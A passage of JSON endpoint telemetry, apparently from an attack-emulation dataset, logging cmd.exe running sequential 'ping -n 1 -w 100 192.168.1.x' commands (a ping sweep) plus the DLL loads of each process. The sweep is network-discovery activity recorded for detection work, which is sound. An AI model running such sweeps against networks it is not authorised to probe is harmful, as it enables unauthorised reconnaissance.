"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "process", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573151830000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.237", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2912, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "process", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573156990000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.238", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2788, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573157130000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "process", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573161830000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.239", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1344, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573161970000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161830000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "process", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573166990000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.240", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3552, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573167210000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167140000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167140000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167140000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167140000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167140000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167140000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167140000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167140000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167140000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167300000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167300000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "process", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573171830000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.241", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3152, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "process", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573176830000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.242", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6756, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "process", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573181830000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.243", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4796, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": 